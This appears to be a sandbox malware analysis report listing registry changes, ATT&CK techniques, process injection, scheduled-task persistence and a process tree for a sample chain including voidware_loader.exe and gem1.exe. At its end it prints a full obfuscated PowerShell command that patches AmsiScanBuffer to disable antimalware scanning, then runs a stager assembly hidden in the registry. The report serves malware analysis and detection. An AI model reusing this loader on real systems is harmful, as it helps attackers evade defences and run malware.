Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7FDE1A1E-8B31-49A5-93B8-6BE14CFA4943}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000ed30bdda43008947a7f8d013a47366226400000078000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000090000000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	New Text Document mod.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\MRUListEx = ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616193"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0400000000000000030000000200000001000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Explorer.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "3"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000004000000030000000200000001000000ffffffff	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\4\0\0\NodeSlot = "9"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell\SniffedFolderType = "Generic"	Explorer.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
8160	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
8444	SCHTASKS.exe
8824	schtasks.exe
3428	schtasks.exe
4012	schtasks.exe
412	schtasks.exe
5140	schtasks.exe
2200	schtasks.exe
7380	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2992	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2528	gem1.exe
2528	gem1.exe
3340	build.exe
3340	build.exe
3340	build.exe
3136	chrome.exe
3136	chrome.exe
5128	gem2.exe
5268	powershell.exe
5268	powershell.exe
5268	powershell.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
5660	dialer.exe
5660	dialer.exe
5128	gem2.exe
5128	gem2.exe
5128	gem2.exe
6104	Lightshot.exe
2156	powershell.exe
2156	powershell.exe
5660	dialer.exe
5660	dialer.exe
2156	powershell.exe
5660	dialer.exe
5660	dialer.exe
2156	powershell.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
2156	powershell.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
2156	powershell.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe
5660	dialer.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
1132	7zFM.exe
3408	chrome.exe
3368	Explorer.EXE

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1132	7zFM.exe
Token: 35	1132	7zFM.exe
Token: SeSecurityPrivilege	1132	7zFM.exe
Token: SeDebugPrivilege	4628	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	4104	._cache_Synaptics.exe
Token: SeDebugPrivilege	3956	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	3352	voidware_loader.exe
Token: SeDebugPrivilege	1096	DirectX111.exe
Token: SeDebugPrivilege	2528	gem1.exe
Token: SeImpersonatePrivilege	2528	gem1.exe
Token: SeDebugPrivilege	3424	gem1.exe
Token: SeImpersonatePrivilege	3424	gem1.exe
Token: SeDebugPrivilege	764	._cache_New Text Document mod.exe
Token: SeDebugPrivilege	3340	build.exe
Token: SeDebugPrivilege	2860	voidware_loader.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeShutdownPrivilege	3136	chrome.exe
Token: SeCreatePagefilePrivilege	3136	chrome.exe
Token: SeDebugPrivilege	5268	powershell.exe
Token: SeDebugPrivilege	5660	dialer.exe
Token: SeShutdownPrivilege	5616	powercfg.exe
Token: SeCreatePagefilePrivilege	5616	powercfg.exe
Token: SeShutdownPrivilege	5664	powercfg.exe
Token: SeCreatePagefilePrivilege	5664	powercfg.exe
Token: SeShutdownPrivilege	5624	powercfg.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
1132	7zFM.exe
1132	7zFM.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe
3136	chrome.exe

Suspicious use of SetWindowsHookEx 19 IoCs

pid	Process
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
2992	EXCEL.EXE
3408	chrome.exe
6976	Conhost.exe
3408	chrome.exe
3408	chrome.exe
3408	chrome.exe
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
3368	Explorer.EXE
2136	Conhost.exe
3408	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 4628	1988	New Text Document mod.exe	81
PID 1988 wrote to memory of 4628	1988	New Text Document mod.exe	81
PID 1988 wrote to memory of 2888	1988	New Text Document mod.exe	83
PID 1988 wrote to memory of 2888	1988	New Text Document mod.exe	83
PID 1988 wrote to memory of 2888	1988	New Text Document mod.exe	83
PID 2888 wrote to memory of 4104	2888	Synaptics.exe	84
PID 2888 wrote to memory of 4104	2888	Synaptics.exe	84
PID 1824 wrote to memory of 3956	1824	New Text Document mod.exe	90
PID 1824 wrote to memory of 3956	1824	New Text Document mod.exe	90
PID 4628 wrote to memory of 3352	4628	._cache_New Text Document mod.exe	94
PID 4628 wrote to memory of 3352	4628	._cache_New Text Document mod.exe	94
PID 3352 wrote to memory of 4012	3352	voidware_loader.exe	95
PID 3352 wrote to memory of 4012	3352	voidware_loader.exe	95
PID 3352 wrote to memory of 1096	3352	voidware_loader.exe	97
PID 3352 wrote to memory of 1096	3352	voidware_loader.exe	97
PID 4628 wrote to memory of 3340	4628	._cache_New Text Document mod.exe	98
PID 4628 wrote to memory of 3340	4628	._cache_New Text Document mod.exe	98
PID 4628 wrote to memory of 3340	4628	._cache_New Text Document mod.exe	98
PID 1096 wrote to memory of 412	1096	DirectX111.exe	100
PID 1096 wrote to memory of 412	1096	DirectX111.exe	100
PID 4628 wrote to memory of 4656	4628	._cache_New Text Document mod.exe	102
PID 4628 wrote to memory of 4656	4628	._cache_New Text Document mod.exe	102
PID 4628 wrote to memory of 4656	4628	._cache_New Text Document mod.exe	102
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 3424	4656	gem1.exe	104
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4656 wrote to memory of 2528	4656	gem1.exe	105
PID 4676 wrote to memory of 764	4676	New Text Document mod.exe	110
PID 4676 wrote to memory of 764	4676	New Text Document mod.exe	110
PID 3136 wrote to memory of 2800	3136	chrome.exe	113
PID 3136 wrote to memory of 2800	3136	chrome.exe	113
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115
PID 3136 wrote to memory of 3196	3136	chrome.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	gem1.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:432

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Modifies data under HKEY_USERS
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pwmKIUDswknw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hviZgIVRhSjoif,[Parameter(Position=1)][Type]$lwpZDHGGmS)$WspJADuXWwb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+'D'+'e'+''+'l'+''+'e'+'gate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+'o'+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+''+'n'+''+'s'+''+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+'t'+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$WspJADuXWwb.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+'de'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+','+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$hviZgIVRhSjoif).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$WspJADuXWwb.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+'',$lwpZDHGGmS,$hviZgIVRhSjoif).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+'m'+[Char](101)+''+','+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $WspJADuXWwb.CreateType();}$SPfFOuEnuTFjf=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+'e'+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+'c'+'ro'+[Char](115)+''+'o'+''+[Char](102)+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+'h'+''+[Char](111)+''+'d'+''+[Char](115)+'');$mBwWlXUNsHkJCt=$SPfFOuEnuTFjf.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+'o'+[Char](99)+'A'+'d'+'dr'+'e'+''+'s'+'s',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+'li'+[Char](99)+''+[Char](44)+''+'S'+'ta'+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IkbRIFsxqfiAjnJZPMH=pwmKIUDswknw @([String])([IntPtr]);$xEKvhpfORPLXIszYoPzbXh=pwmKIUDswknw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WNaDgaTornP=$SPfFOuEnuTFjf.GetMethod('G'+[Char](101)+'t'+[Char](77)+'o'+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+'dle').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+'e'+'l3'+'2'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$yPDHeVJxGBprUZ=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$WNaDgaTornP,[Object](''+'L'+''+'o'+'ad'+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+'r'+''+[Char](121)+''+'A'+'')));$GwqRWphaPVqGPWtgJ=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$WNaDgaTornP,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+'l'+'P'+[Char](114)+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$CTkpRfE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($yPDHeVJxGBprUZ,$IkbRIFsxqfiAjnJZPMH).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'');$UbrQvzWozgOQSGaLI=$mBwWlXUNsHkJCt.Invoke($Null,@([Object]$CTkpRfE,[Object](''+'A'+''+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+'n'+'B'+'u'+''+[Char](102)+'f'+'e'+''+'r'+'')));$mtgrZTeEht=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwqRWphaPVqGPWtgJ,$xEKvhpfORPLXIszYoPzbXh).Invoke($UbrQvzWozgOQSGaLI,[uint32]8,4,[ref]$mtgrZTeEht);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$UbrQvzWozgOQSGaLI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GwqRWphaPVqGPWtgJ,$xEKvhpfORPLXIszYoPzbXh).Invoke($UbrQvzWozgOQSGaLI,[uint32]8,0x20,[ref]$mtgrZTeEht);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](36)+''+[Char](76)+'M'+[Char](88)+''+'s'+'t'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6952

C:\Windows\system32\svchost.exe
